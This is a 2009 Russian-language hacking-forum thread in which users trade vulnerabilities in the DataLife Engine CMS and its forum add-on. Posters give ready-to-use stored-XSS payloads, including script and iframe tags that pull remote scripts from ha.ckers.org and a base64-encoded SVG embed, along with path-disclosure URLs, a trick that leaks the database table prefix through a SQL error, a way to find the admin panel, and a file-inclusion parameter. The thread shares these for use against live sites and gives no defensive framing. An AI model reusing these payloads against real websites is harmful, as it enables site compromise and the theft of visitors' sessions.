 |
|
10.05.2009, 12:20
|
|
Познавший АНТИЧАТ
Регистрация: 22.07.2007
Сообщений: 1,291
С нами:
9897010
Репутация:
766
|
|
там варка в том, что он сохраняет запросы в базу с реферор от гугла или же яши, а если подделать запрос, то можно вызвать скуль эрор, я уже об этом поднимал тему один раз.
|
|
|
10.05.2009, 13:52
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Активные XSS в DLE версии 8.0 (возможно и раньше).
Необходимо несколько специфических настроек.
1) XSS при добавлении новостей из админски, WISYWIG должен быть отключен;
Простое добавление новостей пользователями, WISYWIG должен быть отключен:
Код:
<iframe width=0 border=0 height=0 src=http://ha.ckers.org/scriptlet.html <
Код:
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
Код:
<SCRIPT SRC=http://ha.ckers.org/xss.js?
<
2) XSS в комментариях к новостям, WISYWIG должен быть включен:
Код:
<SCRIPT SRC=http://ha.ckers.org/xss.js?<
(с) by Wildshaman, 2009 год.
|
|
|
|
11.05.2009, 17:14
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
DLE 8.0 Раскрытие путей:
Код:
http://dle-news.ru/index.php?do=pm&doaction=del&dle_allow_hash=06e5bbf84191c990867ee5bbacf879b8&master_box=on&selected_pm[][]=8
dle_allow_hash берется из исходника страницы списка персональных сообщений (для каждого юзверя он свой на каждом сайте)...
Активная XSS (требуется доступ в админку)...
идем в редиактирвоание своей инфы в админке ([site]/admin.php?mod=options&action=personal)
, в поле "Полное имя:" пишем
Код:
<script>alert(/Hacked by Wildshaman/)</script>
и смотрим в свой профиль на сайте ([site]/user/username)
(с)Wildshaman 2009 год
Последний раз редактировалось wildshaman; 11.05.2009 в 17:44..
|
|
|
|
20.05.2009, 11:12
|
|
Новичок
Регистрация: 19.05.2009
Сообщений: 19
С нами:
8936564
Репутация:
1
|
|
Сообщение от wildshaman
Код:
XSS в комментариях к новостям, WISYWIG должен быть включен:
<SCRIPT SRC=http://ha.ckers.org/xss.js?<
Ет коряво и не работает, т.к. к адресу скрипта коннектится "<" и следующий тег, да и полстраницы обрезается... Если в другю сторону загнуть - фильтрует.
З.Ы. Такая же "уязвимость" и в приватных месагах.
Последний раз редактировалось Genry13; 20.05.2009 в 11:15..
|
|
|
|
07.07.2009, 20:38
|
|
Banned
Регистрация: 06.07.2009
Сообщений: 74
С нами:
8867227
Репутация:
209
|
|
Вот тоже нашел xxs, может и баян ну на нулёных версиях пашет как колхозник =)
[XSS]
Код:
http://test1.ru/dle/<script>alert()</script>?mod=main
Вот еще раскрытие путей если админ не удалил папку Upgrade, достаточно перейти по адресу:
Код:
http://test1.ru/dle/upgrade/7.5.php
|
|
|
|
09.07.2009, 01:02
|
|
Новичок
Регистрация: 22.01.2009
Сообщений: 25
С нами:
9106183
Репутация:
8
|
|
Сообщение от mr.gr33n
Вот тоже нашел xxs, может и баян ну на нулёных версиях пашет как колхозник =)
[XSS]
Код:
http://test1.ru/dle/<script>alert()</script>?mod=main
Hacking attempt!
|
|
|
|
28.07.2009, 07:15
|
|
Участник форума
Регистрация: 23.08.2008
Сообщений: 143
С нами:
9324443
Репутация:
52
|
|
Создадим новость и потом откроем код страницы с новостью то получим адресс одминки xD
Код:
<a onclick="return dropdownmenu(this, event, MenuNewsBuild('1', 'full'), '170px')" href="http://site.ru/odmin.php?mod=editnews&action=editnews&id=1" target = "_blank" >
Работает не всегда, смотря от настроек DLE.
Последний раз редактировалось Useroff; 28.07.2009 в 10:33..
|
|
|
|
13.08.2009, 01:41
|
|
Новичок
Регистрация: 05.08.2009
Сообщений: 13
С нами:
8825334
Репутация:
10
|
|
Уязвимость в скрипте: DLE FORUM.
Версии: хз, тестил на 2.3.
Что делает: получение префикса таблиц(dle_ или то, что задал админ, например, blablabla_).
Реализация: добавить сообщение, содержащее тег
а затем, не обновляя страницу, добавить еще одно сообщение. Появится ошибка синтаксиса мускула, при этом откроется, какую именно таблицу не удалось обновить.
Последний раз редактировалось -=BlackSmoke=-; 21.08.2009 в 00:04..
|
|
|
|
05.09.2009, 18:40
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
С нами:
9230381
Репутация:
90
|
|
DataLife Engine 8.2
www.site/path/engine/api/api.class.php?dle_config_api=[file]
Последний раз редактировалось InFlame; 05.09.2009 в 19:37..
|
|
|
|
05.09.2009, 18:59
|
|
Banned
Регистрация: 04.09.2009
Сообщений: 67
С нами:
8781184
Репутация:
22
|
|
DataLife Engine 8.2
www.site/path /engine/api/api.class.php?dle_config_api=[file]
ниче не вижу
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
